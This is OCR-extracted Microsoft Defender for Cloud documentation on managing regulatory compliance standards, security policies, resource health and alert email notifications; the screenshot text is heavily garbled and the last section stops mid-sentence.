Standards for Azure subscriptions Standards for AWS Standards for GCP 
FedRAMP M 


accounts projects 
HIPAA/HITRUST 

SWIFT CSP CSCF v2020 

UK OFFICIAL and UK NHS 

Canada Federal PBMM 

New Zealand ISM Restricted 


New Zealand ISM Restricted v3.5 


Australian Government ISM 
Protected 


RMIT Malaysia 


Q Tip 


Standards are added to the dashboard as they become available. This table might 
not contain recently added standards. 


Add a regulatory standard to your dashboard 
The following steps explain how to add a package to monitor your compliance with one 
of the supported regulatory standards. 

Prerequisites 

To add standards to your dashboard: 


e The subscription must have one or more Defender plans enabled. 
e The user must have owner or policy contributor permissions 


O Note 


It may take a few hours for a newly added standard to appear in the compliance 
dashboard. 


Add a standard to your Azure subscriptions 


1. From Defender for Cloud's menu, select Regulatory compliance to open the 
regulatory compliance dashboard. Here you can see the compliance standards 
assigned to the currently selected subscriptions. 


2. From the top of the page, select Manage compliance policies. 


3. Select the subscription or management group for which you want to manage the 
regulatory compliance posture. 


@ Tip 


We recommend selecting the highest scope for which the standard is 
applicable so that compliance data is aggregated and tracked for all nested 
resources. 


4. Select Security policy. 


5. Expand the Industry & regulatory standards section and select Add more 
standards. 


6. From the Add regulatory compliance standards page, you can search for any of 
the available standards: 


Home > Microsoft Defender for Cloud | Regulatory compliance > Environment settings > Settings | Security policy 


Add regulatory compliance standards 


Click Add on the standards that you want to add to the regulatory compliance dashboard and then assign it to the subscription. After completing the assignment , the 


custom policies will be available in the Regulatory compliance dashboard 


Name TL Description TA TA 
NIST SP 800-53 R4 Track NIST SP 800-53 R4 controls in the Compliance Dashboard, based on a recommend. Add | 
NIST SP 800 171 R2 Track NIST SP 800 171 R2 controls in the Compliance Dashboard, based on a recommend Add 

UKO and UK NHS Track UK OFFICIAL and UK NHS controls in the Compliance Dashboard, based on a reco... Add, 
Canada Federal PBMM Track Canada Federal PBMM controls in the Compliance Dashboard, based on a recomm. Ce 
HIPAA HITRUST Track HIPAA/HITRUST controls in the Compliance Dashboard, based on a recommended _ Aa 


7. Select Add and enter all the necessary details for the specific initiative such as 
scope, parameters, and remediation. 


8. From Defender for Cloud's menu, select Regulatory compliance again to go back 
to the regulatory compliance dashboard. 


The selected standard appears on the dashboard. 


Home > Microsoft Defender for Cloud 


E Microsoft Defender for Cloud | Regulatory 


Showing 40 subscription 
[© Search & dk Download report @ Manage compliance policies 
General 

© Overview 


=] Getting started Azure Security Benchmark 


Z= Recommendations 
3 of 43 passed controls 


Security alerts = 


Inventory 


Security explorer 


9 

E 

ZA 

@ Workbooks 
2 Community 
a 


Diagnose and solve problems 


Cloud security 
D Secure score 
@ Regulatory compliance 


Ọ Azure Defender 


Gizatea D tana at compance controls 


Controls TL 
Management 


I Environment settings Y O NS.Network Security 


EO V @ IM identity Management 


88 Workflow automation V D PAPrivileged Access 


A @ DP.Data Protection 


V D DP-2. Monitor anomalies and threats targeting sensitive data Control details 


V © DP-3. Encrypt sensitive data in transit Control details [ws] [€ 


Microsoft Cloud Security Benchmark v3 


compliance #2 


E Open query 


PCI DSS 3.2.1 


Azure Security Benchmark is applied to 7 subscriptions 


B creste eterno 


E Anse reposts 


© You can now fully customize the standards you track in the dashboard. Update your dashborad by selecting “Manage compliance policies” above > 


Lowest compliance regulatory standards 


E 


NIST SP 800 53 R5 


UKO and UJ NHS 


PCI DSS 3.2.1 


A @ DP-4. Enable data at rest encryption by default Control details [ms] [ 


Automated assessments -Azure | c | 


Virtual machines should encrypt temp disks, caches, and data flows between Compute and Storage resources 


Automation account variables should be encrypted 


Service Fabric clusters should have the ClusterProtectionLevel property set to EncryptAndSign 


Transparent Data Encryption on 


Automated assessments -AWS 


SQL databases should be enabled 


Attached EBS volumes should be encrypted at-rest 


EBS default encryption should be enabled 


Amazon SOS queues should be encrypted at rest EEE 


A @ DP-5. Use customer-managed key option in data at rest encryption when required Control details [ms 
‘A @ DP-6. Use a secure key management process Control details [ms] [ 


A © DP-7. Use a secure certificate management process Control details 


Resource type 


A Virtual machines 


AMO 


7/58 


Ww 


8/43 


SOC TSP HIPAA HITRUST NIST SP 8ONIST SP 800 171 R2 UKO and UJNHS Canada Federal PBMM 


XC Automation account variables 


Cy Service fabric clusters 


S SAL databases 


AWS EC2 Volumes 


$ AWS Sts Account in Regions 


$ AES SQS Queues 


Assign a standard to your AWS accounts 


To assign regulatory compliance standards on AWS accounts: 


1. Navigate to Environment settings. 


2. Select the relevant AWS account. 


3. Select Standards. 


Audit reports (Preview) 


Failed resources 
47 of 127 

1of2 

Oof2 


Gin 


1of2 
Oof2 


GEO 


Environments 


Stay up to date on the latest privacy, 
security, and compliance-related 
information for Microsoft's cloud services. 


@ Azure @ AWS OGC 


Under each applicable compliance control is the set of assessments run by Defender for Cloud that are associated with that control. If they are all green, it means those assessments are currently passing: this does not ensure you are fully compliant with that control, Furthermore, not all controls for 
any particular regulation are covered by Defender for Cloud assessments, and therefore this report is only a partial view of your overall compliance status. 


Resource compliance status 


4. Select the three dots alongside an unassigned standard and select Assign 


standard. 


Home 


= Settings | Standards 


Showing account MDC_Containers demo’ 


2P Search Ie + Create 


Settings 
Defender plans 


@ Environment details 


Microsoft Defender for Cloud | Environment settings 


Settings 
© Refresh 
Custom munean (preview) 


Lo Search by name 


<= Standards 


Showing 1-10 of 22 items 


Policy settings hana 


© Governance rules 


D 


OI CIS AWS Foundations v1.5.0 
CIS AWS Foundations v1.5.0 


g CloudFrontWebDistributionSafeena 


test 


g Custom standard 
Custom 


Standard type : All 


Recommendations 7 


56 


Type t 


Compliance 


Custom 


Custom 


Security standards contain comprehensive sets of security recommendations to help secure your cloud environments. The below standards are assigned on your environment. 


Assigned on 1 


Not 
Not z 

Delete = 
Not assigned 


5. At the prompt, select Yes. The standard is assigned to your AWS account. 


Assign standard ‘Custom standard’ 


Are you sure you would like to assign standard ‘Custom standard‘? 


a 


6. From Defender for Cloud's menu, select Regulatory compliance again to go back 
to the regulatory compliance dashboard. 


The selected standard appears on the dashboard. 


Assign a standard to your GCP projects 
To assign regulatory compliance standards on GCP projects: 
1. Navigate to Environment settings. 
2. Select the relevant GCP project. 
3. Select Standards. 


4. Select the three dots alongside an unassigned standard and select Assign 


standard. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


y= Settings | Standards 
wre Ning project 'mdc-containers-demo2' 


+ Create ©) Refresh 


Setting: @ custom recommendations are inactive for this scope. To activate custom recommendations, upgrade to Defender CSPM plan. Learn more o 
Defender pl re sew) 
OA Environment detail 
Security standards contain comprehensive sets of security recommendations to help secure your cloud environments. The below standards are assigned on your environment. 
Standard 
P Search by name Standard type : All 
Policy settings 


= Showing 1-10 of 19 items 
© Governance rules 


Name t Recommendations + Type 1 Assigned on 7 
a 
> Custom standard 
EZ Custom ni Custom Not assigned 


> His GCP custom 


Z 2 
KS EEE repro - VM assessments 7 Custom Not assigned 
GCP CSPM (Preview) 

KZ GCP CSPM (Preview) 3 ‘Compliance Not assigned 


> GCP Custom 
6 Custom Not; 


Z E 
‘=a Testing by Lior View recom 
n GCP custom standard Edit GQ A 
GN test 19 Custom Not, 

Assign standard E 


Page| v]of2 Delete 


5. At the prompt, select Yes. The standard is assigned to your GCP project. 


Assign standard GGE Custom’ 


Are you sure you would like to assign standard GGE Custom’? 


2 


6. From Defender for Cloud's menu, select Regulatory compliance again to go back 
to the regulatory compliance dashboard. 


The selected standard appears on the dashboard. 


Remove a standard from your dashboard 


You can continue to customize the regulatory compliance dashboard, to focus only on 
the standards that are applicable to you, by removing any of the supplied regulatory 
standards that aren't relevant to your organization. 


To remove a standard: 
1. From Defender for Cloud's menu, select Security policy. 


2. Select the relevant subscription from which you want to remove a standard. 


O Note 


You can remove a standard from a subscription, but not from a management 
group. 


The security policy page opens. For the selected subscription, it shows the default 
policy, the industry and regulatory standards, and any custom initiatives you've 
created. 


Security policy 


Contoso 


Security policy on: Contoso 


Policies assigned in this subscription 


v D Microsoft Defender for Cloud default policy 


A ‘ell Industry & regulatory standards 


Compliance policies that you can view in the compliance dashboard. To add more compliance standards, click Add more standards. 


PCI DSS 3.2.1 Track PCI-DSS v3.2.1:2018 controls in the Compliance Dashboard, Out of the box 
based on a recommended set of policies and assessments. 


| Disable | 


ISO 27001 Track ISO 27001:2013 controls in the Compliance Dashboard, Out of the box 
based on a recommended set of policies and assessments. 


| d | 


SOC TSP Track SOC TSP controls in the Compliance Dashboard, based on a Out of the box 


à | Disable | 
recommended set of policies and assessments. br) 


NIST SP 800-53 R4 Track NIST SP 800-53 R4 controls in the Compliance Dashboard, Manually added | 
based on a recommended set of policies and assessments. 


Add more standards 


Deletg 


3. For the standard you want to remove, select Disable. A confirmation window 
appears. 


Security policy & 


Contoso 


Disable 
If you disable ISO 27001, it will be removed from your compliance dashboard. Are you sure you want to disable ISO 27001? 


EES E 


4. Select Yes. 


Next steps 


In this article, you learned how to add compliance standards to monitor your 
compliance with regulatory and industry standards. 


For related material, see the following pages: 


e Microsoft cloud security benchmark 
e Defender for Cloud regulatory compliance dashboard - Learn how to track and 
export your regulatory compliance data with Defender for Cloud and external tools 


e Working with security policies 


Manage security policies 
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This page explains how security policies are configured, and how to view them in 
Microsoft Defender for Cloud. 


To understand the relationships between initiatives, policies, and recommendations, see 
What are security policies, initiatives, and recommendations? 


Who can edit security policies? 


Defender for Cloud uses Azure role-based access control (Azure RBAC), which provides 
built-in roles you can assign to Azure users, groups, and services. When users open 
Defender for Cloud, they see only information related to the resources they can access. 
Which means users are assigned the role of owner, contributor, or reader to the 
resource's subscription. There are two specific Defender for Cloud roles that can view 
and manage security policies: 


e Security reader: Has rights to view Defender for Cloud items such as 
recommendations, alerts, policy, and health. Can't make changes. 

e Security admin: Has the same view rights as security reader. Can also update the 
security policy and dismiss alerts. 


You can edit Azure security policies through Defender for Cloud, Azure Policy, via REST 
API or using PowerShell. 


Manage your security policies 


To view your security policies in Defender for Cloud: 


1. From Defender for Cloud's menu, open the Environment settings page. Here, you 
can see the Azure management groups or subscriptions. 


2. Select the relevant subscription or management group whose security policies you 


want to view. 
3. Open the Security policy page. 


4. The security policy page for that subscription or management group appears. It 
shows the available and assigned policies. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


@: Settings | Security policy 


7 CyberSecSOC 


[© Search | « Security policy on: CyberSecSOC 


Settings initiatives enabled on this subscription 


©) Defender plans eee 
p ^ Default initiative 
® Email notifications 


Tó Workflow automation 
The default initiative enabled on your subscription generates the security recommendations in the Recommendations page. 
© Integrations 


E Continuous export Assignment Assigned On Audit policies Deny policies Disabled policies Exempted polici... 
Policy settings ASC Default (subscription: d... ? Subscription 195 1 12 0 
©: Security policy [Preview]: Enable Monitorin... [x] Management group 193 0 15 0 


®© Governance rules 


boi Industry & regulatory standards 


Compliance initiatives shown in the Regulatory compliance dashboard. 


Microsoft cloud security Track Microsoft Cloud Security Out of the box 

benchmark Benchmark controls in the ee 
Compliance Dashboard, based on a Disable 
recommended set of policies and 
assessments. 


PCI DSS 3.2.1 Track PCI-DSS v3.2.1:2018 controls Out of the box b, 
in the Compliance Dashboard, 


Disable 
based on a recommended set of : 


policies and assessments. 


O Note 


The settings of each recommendation that apply to the scope are compared 
and the cumulative outcome of actions taken by the recommendation 
appears. For example, if in one assignment, a recommendation is Disabled, 
but in another it's set to Audit, then the cumulative effect applies Audit. The 
more active effect always takes precedence. 


5. Choose from the available options on this page: 


a. To work with industry standards, select Add more standards. For more 
information, see Customize the set of standards in your regulatory compliance 
dashboard. 


b. To assign and manage custom initiatives, select Add custom initiatives. For 
more information, see Using custom security initiatives and policies. 


c. To view and edit the default initiative, select it and proceed as described below. 


Home > Microsoft Defender for Cloud | Environment settings > Settings 


@: Settings | Security policy 
“" ASC Multi-Cloud Demo 
© Search « 
EEEak Security policy on: ASC Multi-Cloud Demo 
Settings 


= initiatives enabled on this subscription 
©) Defender plans 


@ Email notifications Ea E Default initiative 


TS Workflow automation 


© Integrations The default initiative enabled on your subscription generates the security recommendations in the Recommendations page. 
Continuous export 


Policy settings 


© Security policy 


© Governance rules (preview) 
^ Industry & regulatory standards 


Compliance initiatives shown in the Regulatory compliance dashboard. 


Microsoft cloud security Track Microsoft Cloud Security Out of the box 
benchmark Benchmark controls in the Compliance 

Dashboard, based on a recommended 

set of policies and assessments. 


Disable 


PCI DSS 3.2.1 Track PCI-DSS v3.2.1:2018 controls in Out of the box 
the Compliance Dashboard, based on a 
recommended set of policies and 
assessments. 


Disable 


ISO 27001 Track ISO 27001:2013 controls in the Out of the box 
Compliance Dashboard, based ona Disable 
recommended set of policies and 
assessments. 


SOC TSP Track SOC TSP controls in the Out of the box 
Compliance Dashboard, based on a Di 
recommended set of policies and E 


assessments 


Add more standards 


This Security policy screen reflects the action taken by the policies assigned on 
the subscription or management group you selected. 


e Use the links at the top to open a policy assignment that applies on the 
subscription or management group. These links let you access the 
assignment and manage recommendations. For example, if you see that a 
particular recommendation is set to audit effect, use to change it to deny 
or disable from being evaluated. 


e Inthe list of recommendations, you can see the effective application of the 
recommendation on your subscription or management group. 


e The recommendations’ effect can be: 


Audit evaluates the compliance state of resources according to 
recommendation logic. 

Deny prevents deployment of non-compliant resources based on 
recommendation logic. 


Disabled prevents the recommendation from running. 


= Microsoft Azure (Preview) P Search resources, services, and docs (G+/) , & © ‘CONTOsO.cOM $ 


Home 


ASC Default (Subscription-Id) x 


CyberSecSOC 


@: Open in Azure Policy A Guides & Feedback 


P Sear h Resource type: All X Effect: All X Y Add filter 

Name î Resource type Effect © Exempted resources Additional parameters 
A maximum of 3 owners should be designated for subscriptions Subscription Audit Oof1 None 

API Management services should use a virtual network Azure resource Audit - Default 


Access to storage accounts with firewall and virtual network configurations should be restricted Audit 0 of 94 None 

Accounts with owner per ces should be MFA enabled Audit 0of1 None 

Accounts with read permi s should be MFA enabled Audit 0of1 None 

Accounts with write pern n Azure resources should be MFA enabled Audit ZEA None 

Adaptive application controls for defining safe applications should be enabled on your machines Audit EGO None 

Adaptive network hardening recommendations should be applied on internet facing virtual machines Virtual machine Audit 0of71 None 

All network ports should be restricted on network security groups associated to your virtual machine Virtual machine Audit Oof71 None 

Allowlist rules in your adaptive application control policy should be updated Virtual machine +2 © Audit Oof71 None 

App Configuration should use private link Azure resource Audit - None 

Audit retention for SQL servers should be set to at least 90 days ‘SQL server Audit 0of8 None 

Auditing on SQL server should be enabled SQL server Audit Oof8 None 

Authentication to Linux machines should require SSH keys Virtual machine Audit Oof29 Default bt 
Auto provisioning of the Log Analytics agent should be enabled on subscriptions Audit ZEA None Q 
Automation account variables should be encrypted ion account variable Audit O of 17 None SO 
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Enable a security recommendation 


Some recommendations might be disabled by default. For example, in the Azure 
Security Benchmark initiative, some recommendations are provided for you to enable 
only if they meet a specific regulatory or compliance requirement for your organization. 
For example: recommendations to encrypt data at rest with customer-managed keys, 


such as "Container registries should be encrypted with a customer-managed key 
(CMK)". 


To enable a disabled recommendation and ensure it's assessed for your resources: 
1. From Defender for Cloud's menu, open the Environment settings page. 


2. Select the subscription or management group for which you want to disable a 
recommendation. 


3. Open the Security policy page. 
4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to disable, either by the search bar 
or filters. 


6. Select the ellipses menu, select Manage effect and parameters. 
7. From the effect section, select Audit. 


8. Select Save. 


Microsoft Azure (Preview) E Search resources, services, and docs (G+/) EI E aA & © Q CONTOSO.COM $ 


Home 


ASC Default (Subscription-Id) 


CyberSecSOC 


@: Open in Azure Policy Ay Guides & Feedback 


[ P Search Resource type : All X Effect: All X Y Add filter 


Accounts with owner permissions on Azure resources should be MFA enabled 

Accounts with read permissions on Azure resources should be MFA enabled 

Accounts with write permissions on Azure resources should be MFA enabled 

Adaptive application controls for defining safe applications should be enabled on your machines 
Adaptive network hardening recommendations should be applied on internet facing virtual machines 
All network ports should be restricted on network security groups associated to your virtual machine 
Allowlist rules in your adaptive application control policy should be updated 

App Configuration should use private link 

Audit retention for SQL servers should be set to at least 90 days 

Auditing on SQL server should be enabled 

Authentication to Linux machines should require SSH keys 

Auto provisioning of the Log Analytics agent should be enabled on subscriptions 

Automation account variables should be encrypted 

Azure Arc-enabled Kubernetes clusters should have the Azure Policy extension installed 

Azure Arc-enabled Kubernetes clusters should have the Defender extension installed 

Azure Backup should be enabled for virtual machines 

Azure Cosmos DB accounts should have firewall rules 


Azure Cosmos DB accounts should use Azure Active Directory as the only authentication method 
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O Note 


Subscription 
Subscription 

Subscription 

Virtual machine +2 © 
Virtual machine 

Virtual machine 

Virtual machine +2 © 

Azure resource 

SQL server 

SQL server 

Virtual machine 
Subscription 

Automation account variable 
Connected cluster 
Connected cluster 

Virtual machine 

Azure resource 


Azure resource 


Manage effect and parameters x 


Automation account variables should be encrypted 


Effect © 


O Audit 


O Disabled 
© beny 


a 


DEE Tz Reset vo defo 


Setting will take effect immediately, but recommendations will update based 


on their freshness interval (up to 12 hours). 


Manage a security recommendation's settings 


It may be necessary to configure additional parameters for some recommendations. As 


an example, diagnostic logging recommendations have a default retention period of 1 


day. You can change the default value if your organizational security requirements 


require logs to be kept for more than that, for example: 30 days. The additional 


parameters column indicates whether a recommendation has associated additional 


parameters: 


Default — the recommendation is running with default configuration 


Configured — the recommendation’s configuration is modified from its default values 


None - the recommendation doesn't require any additional configuration 


1. From Defender for Cloud's menu, open the Environment settings page. 


2. Select the subscription or management group for which you want to disable a 


recommendation. 


3. Open the Security policy page. 


4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to configure. 


Tip 
To view all available recommendations with additional parameters, using the 
filters to view the Additional parameters column and then default. 

6. Select the ellipses menu and select Manage effect and parameters. 


7. From the additional parameters section, configure the available parameters with 


new values. 


8. Select Save. 


= Microsoft Azure (Preview) © Search resources, services, and docs (G+/) El R 2 & O FH contosocom E 


Home Manage effect and parameters x 
ASC Default (Su bscription-Id) i Container CPU and memory limits should be enforced 
CyberSecSOC 

Effect © 


E Open in Azure Policy E Guides & Feedback 


@ audit 
P Search Resource type: All X Effect: All X E Add filter O Disabled 
Azure Event Grid domains should use private link Azure resource Aut 

O peny 
Azure Event Grid topics should use private link Azure resource 
Azure Kubernetes Service clusters should have Defender profile enabled Managed cluster eurra B 

itional parameters 
Azure Kubernetes Service clusters should have the Azure Policy add-on for Kubernetes installed Managed cluster Max allowed CPU units in Kubernetes cluster © 
2 

Azure Machine Learning workspaces should use private link Azure resource [32 
Azure Spring Cloud should use network injection Servers Max allowed memory bytes in Kubernetes cluster © 

| 64Gi 
Blocked accounts with owner permissions on Azure resources should be removed Subscription 

Kubernetes namespaces to exclude from monitoring of memory and CPU limits © 

Blocked accounts with read and write permissions on Azure resources should be removed Subscription 

| L'kube-system", "gatekeeper-system’, "azure-arc", "azuredefender’, "mdc"] 
CORS should not allow every resource to access Function Apps Function app 

Kubernetes image to exclude from monitoring of all container related polices © 
CORS should not allow every resource to access Web Applications Web application ir 
Cognitive Services accounts should restrict network access Azure resource 
Container CPU and memory limits should be enforced Managed cluster 
Container hosts should be configured securely Container host Aut 
Container images should be deployed from trusted registries only Managed cluster Aut 
Container registries should not allow unrestricted network access Container registry Aut 
Container registries should use private link Container registry Au 
Container registry images should have vulnerability findings resolved Container registry Au Q 
Container with privilege escalation should be avoided Managed cluster Aut 
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Use the "reset to default" button to revert changes per the recommendation and restore 
the default value. 


Disable a security recommendation 


When your security policy triggers a recommendation that's irrelevant for your 
environment, you can prevent that recommendation from appearing again. To disable a 
recommendation, select an initiative and change its settings to disable relevant 
recommendations. 


The recommendation you want to disable will still appear if it's required for a regulatory 
standard you've applied with Defender for Cloud's regulatory compliance tools. Even if 


you've disabled a recommendation in the built-in initiative, a recommendation in the 


regulatory standard's initiative will still trigger the recommendation if it's necessary for 
compliance. You can't disable recommendations from regulatory standard initiatives. 


Learn more about managing security recommendations. 
1. From Defender for Cloud's menu, open the Environment settings page. 
2. Select the subscription or management group for which you want to enable a 
recommendation. 
© Note 


Remember that a management group applies its settings to its subscriptions. 
If you disabled a subscription's recommendation, and the subscription 
belongs to a management group that still uses the same settings, then you 
will continue to receive the recommendation. The security policy settings will 
still be applied from the management level and the recommendation will still 
be generated. 

3. Open the Security policy page. 


4. From the Default initiative section, select the relevant initiative. 


5. Search for the recommendation that you want to enable, either by the search bar 
or filters. 


6. Select the ellipses menu, select Manage effect and parameters. 
7. From the effect section, select Disabled. 


8. Select Save. 


O Note 


Setting will take effect immediately, but recommendations will update based 
on their freshness interval (up to 12 hours). 


Next steps 
This page explained security policies. For related information, see the following pages: 


e Learn how to set policies using PowerShell 
e Learn how to edit a security policy in Azure Policy 


e Learn how to set a policy across subscriptions or on Management groups using 


Azure Policy 
e Learn how to enable Defender for Cloud on all subscriptions in a management 


group 


Tutorial: Investigate the health of your 
resources 
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The resource health page provides a snapshot view of the overall health of a single 
resource. You can review detailed information about the resource and all 
recommendations that apply to that resource. Also, if you're using any of the advanced 
protection plans of Microsoft Defender for Cloud, you can see outstanding security 
alerts for that specific resource too. 


This single page, currently in preview, in Defender for Cloud's portal pages shows: 


1. Resource information - The resource group and subscription it's attached to, the 
geographic location, and more. 

2. Applied security feature - Whether a Microsoft Defender plan is enabled for the 
resource. 

3. Counts of outstanding recommendations and alerts - The number of outstanding 
security recommendations and Defender for Cloud alerts. 

4. Actionable recommendations and alerts - Two tabs list the recommendations and 
alerts that apply to the resource. 


Dashboard Microsoft Defender for Cloud 
Resource health ~- x 
© 
E 1809later : 
Recommendations Alerts 
@ Monitored P Search Status == All X Severity == All X 
Resource information Severit ity Description Status 
= fo ps associated to your virtual machine © Unhealthy 
E fo dations should be applied on internet facing virtual machines © Unhealthy 
ge la e applied on virtual machines © Unhealthy 
d fo System updates should be installed on your machines © Unhealthy 
ga la Management ports of virtual machines should be protected with just-in-time network access control © Unhealthy 
Security value © D dium © Unhealthy 
Desens for Sone Medium © Unhealthy 
Medi © Unhealthy 
Low © Unhealthy 
Low © Unhealthy 
Low © Unhealthy 
Low © Unhealthy 
Low © Unhealthy 
Low © Unhealthy 
Low © Unhealthy 
lo © Unhealthy 
High = Healthy 
High © Healthy 
High © Healthy 
High Log Analytics agent should be installed on your virtual machine © Healthy 
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In this tutorial you'll learn how to: 


v Access the resource health page for all resource types 


vV Evaluate the outstanding security issues for a resource 
Y Improve the security posture for the resource 


Prerequisites 


To step through the features covered in this tutorial: 


e An Azure subscription If you don’t have an Azure subscription, create a free 
account? before you begin. 

e To apply security recommendations, you must be signed in with an account that 
has the relevant permissions (Resource Group Contributor, Resource Group Owner, 
Subscription Contributor, or Subscription Owner) 

e To dismiss alerts, you must be signed in with an account that has the relevant 
permissions (Security Admin, Subscription Contributor, or Subscription Owner) 


Access the health information for a resource 


Q Tip 


In the following screenshots, we're opening a virtual machine, but the resource 
health page can show you the details for all resource types. 


To open the resource health page for a resource: 
1. Select any resource from the asset inventory page. 


ha Microsoft Defender for Cloud | Inventory 


| © Search (Ctrl+/) | « (®) Refresh -+ Add non-Azure servers “S Open query d Download CSV report 
General ETO e e 
| Filter by name Subscriptio... == All X Resource Groups == All X Resource types == All X< Azure Defender == All > 


D overview erra e Za e 
Agent monitoring == All X Cloud Environments == All X Recommendations == All > y Add filter 


@ Getting started 


Z= Recommendations Total Resources Unhealthy Resources Unmonitored Resources Unregistered subscriptions 
EERON 4569 == 3472 % 30 fo 0 
TZ Inventory 
EA 2019-datacenter-core..._ Virtual machines Contoso Infra1 @ installed On = 
@ workbooks 
EA 2019-datacenter-core.._ Virtual machines Contoso Infra1 @ installed On k= 
GO Community 
EA is0later Virtual machines Contoso Infra1 © installed On B 
Cloud Security 
E — ei Virtual machines Contoso Infra1 © Not installed On A Bee 
© Secure Score 
E wom Virtual machines Contoso Infra1 © installed On be Bee 
S Regulatory compliance 
j E E vm319test Virtual machines Contoso Infra1 @ installed On = 


2. Use the left pane of the resource health page for an overview of the subscription, 
status, and monitoring information about the resource. You can also see whether 


enhanced security features are enabled for the resource: 


Resource health 


1809later 
virtual machine 
@ Monitored Z= 16 ABE 
Monitoring Active recommendations Active alerts 
Resource information 
Subscription Resource Group 
Contoso Infra rg-test 
Environment Location 
Azure eastus 
Operating System Status 
Windows VM running 
Security value 


Microsoft Defender for Servers 
On 


3. Use the two tabs on the right pane to review the lists of security recommendations 
and alerts that apply to this resource: 


Recommendations Alerts 


D Search Status == All X Severity == All X 
Severity Description 
fo All network ports should be restricted on network security groups associated to your virtual machine 
Adaptive network hardening recommendations should be applied on internet facing virtual machines 
System updates should be installed on your machines 
f-o Management ports of virtual machines should be protected with just-in-time network access control 
fio Disk encryption should be applied on virtual machines 
leena Windows Defender Exploit Guard should be enabled on your machines Preview 
leena A vulnerability assessment solution should be enabled on your virtual machines 
lesa Management ports should be closed on your virtual machines 
Low Vulnerabilities in security configuration on your machines should be remediated 
Low Azure Backup should be enabled for virtual machines Preview 


[e] 
= 


D 
= 


[e] 
= 


Low 


I I E 
So 6 = 
ba ed 7 


O Note 


Dependency agent should be enabled for listed virtual machine images 

Audit Windows machines that do not have a maximum password age of 70 days 

Audit Windows machines that do not have a minimum password age of 1 day 

Audit Windows machines that do not restrict the minimum password length to 14 characters 
Audit Windows machines that allow re-use of the previous 24 passwords 

Audit diagnostic setting 

Virtual machines should be migrated to new Azure Resource Manager resources 


Windows web servers should be configured to use secure communication protocols Preview 


Status 


Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 
Unhealthy 


Unhealthy 


Unhealthy 


Unhealthy 


AB 


Healthy 


Microsoft Defender for Cloud uses the terms "healthy" and "unhealthy" to 


describe the security status of a resource. These terms relate to whether the 


resource is compliant with a specific security recommendation. 


In the screenshot above, you can see that recommendations are listed even 


when this resource is "healthy". One advantage of the resource health page is 


that all recommendations are listed so you can get a complete picture of your 


resources’ health. 


Evaluate the outstanding security issues for a 


resource 


The resource health page lists the recommendations for which your resource is 


"unhealthy" and the alerts that are active. 


e To ensure your resource is hardened according to the policies applied to your 


subscriptions, fix the issues described in the recommendations: 


1. From the right pane, select a recommendation. 


2. Continue as instructed on screen. 


Q Tip 


The instructions for fixing issues raised by security recommendations 
differ for each of Defender for Cloud's recommendations. 


To decide which recommendations to resolve first, look at the severity of 
each one and its potential impact on your secure score. 
e To investigate a security alert: 


1. From the right pane, select an alert. 
2. Follow the instructions in Respond to security alerts. 


Next steps 
In this tutorial, you learned about using Defender for Cloud's resource health page. 
To learn more, see these related pages: 


e Respond to security alerts 
e Review your security recommendations 


Quickstart: Configure email notifications 
for security alerts 
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Security alerts need to reach the right people in your organization. By default, Microsoft 
Defender for Cloud emails subscription owners whenever a high-severity alert is 
triggered for their subscription. This page explains how to customize these notifications. 


Use Defender for Cloud's Email notifications settings page to define preferences for 
notification emails including: 


e who should be notified - Emails can be sent to select individuals or to anyone with 
a specified Azure role for a subscription. 

e what they should be notified about - Modify the severity levels for which 
Defender for Cloud should send out notifications. 


To avoid alert fatigue, Defender for Cloud limits the volume of outgoing mails. For each 
subscription, Defender for Cloud sends: 


e approximately four emails per day for high-severity alerts 
e approximately two emails per day for medium-severity alerts 
e approximately one email per day for low-severity alerts 


@ Settings | Email notifications ~ x 


Email recipients 
Select who'll get the email notifications from Defender for Cloud for the Contoso subscription. 


All users with the following roles | Owner Vv | 


One or 


Additional email addresses (separated by commas) more email addresses separated by commas “ | 


Notification types 


Use the settings below to select the type of email notifications to be sent by Defender for Cloud. 


Notify about alerts with the following severity (or higher): High ba 


@ You'll receive a maximum of one email per 6 hours for high-severity alerts, one email per 12 hours for medium-severity alerts 
and one email per 24 hours for low-severity alerts. Learn more > 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Email notifications are free; for security alerts, enable the enhanced 


security plans (plan pricing Z) 


Required roles and Security Admin 
permissions: Subscription Owner 
Contributor 


Clouds: @ commercial clouds 
© National (Azure Government, Microsoft Azure operated by 
21Vianet) 


Customize the security alerts email 
notifications via the portal 
You can send email notifications to individuals or to all users with specific Azure roles. 


1. From Defender for Cloud's Environment settings area, select the relevant 
subscription, and open Email notifications. 


2. Define the recipients for your notifications with one or both of these options: 


e From the dropdown list, select from the available roles. 
e Enter specific email addresses separated by commas. There's no limit to the 
number of email addresses that you can enter. 


3. To apply the security contact information to your subscription, select Save. 


Customize the alerts email notifications 
through the API 


You can also manage your email notifications through the supplied REST API. For full 
details, see the SecurityContacts API documentation. 


This is an example request body for the PUT request when creating a security contact 
configuration: 


URI: 
https: //management.azure.com/subscriptions/<SubscriptionId>/providers/Microsoft.Sec 


urity/securityContacts/default ?api-version=2020-01-01-preview 


JSON 
{ 
"properties": { 
"emails": "“admin@contoso.com;admin2@contoso.com", 
"notificationsByRole": { 
"state": "On", 
"poles": ["AccountAdmin", "Owner" ] 
ne 
"alertNotifications": { 
EERUEO 
"minimalSeverity": "Medium" 
Fo 
"phone": "" 


Next steps 
To learn more about security alerts, see the following pages: 


e Security alerts - a reference guide - Learn about the security alerts you might see 
in Microsoft Defender for Cloud's Threat Protection module. 

e Manage and respond to security alerts in Microsoft Defender for Cloud - Learn 
how to manage and respond to security alerts. 

e Workflow automation - Automate responses to alerts with custom notification 
logic. 


Quickstart: Create an automatic 
response to a specific security alert 
using an ARM template or Bicep 
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In this quickstart, you'll learn how to use an Azure Resource Manager template (ARM 
template) or a Bicep file to create a workflow automation. The workflow automation will 
trigger a logic app when specific security alerts are received by Microsoft Defender for 
Cloud. 


Prerequisites 


If you don't have an Azure subscription, create a free account’ before you begin. 


For a list of the roles and permissions required to work with Microsoft Defender for 


Cloud's workflow automation feature, see workflow automation. 


The examples in this quickstart assume you have an existing Logic App. To deploy the 
example, you pass in parameters that contain the logic app name and resource group. 
For information about deploying a logic app, see Quickstart: Create and deploy a 
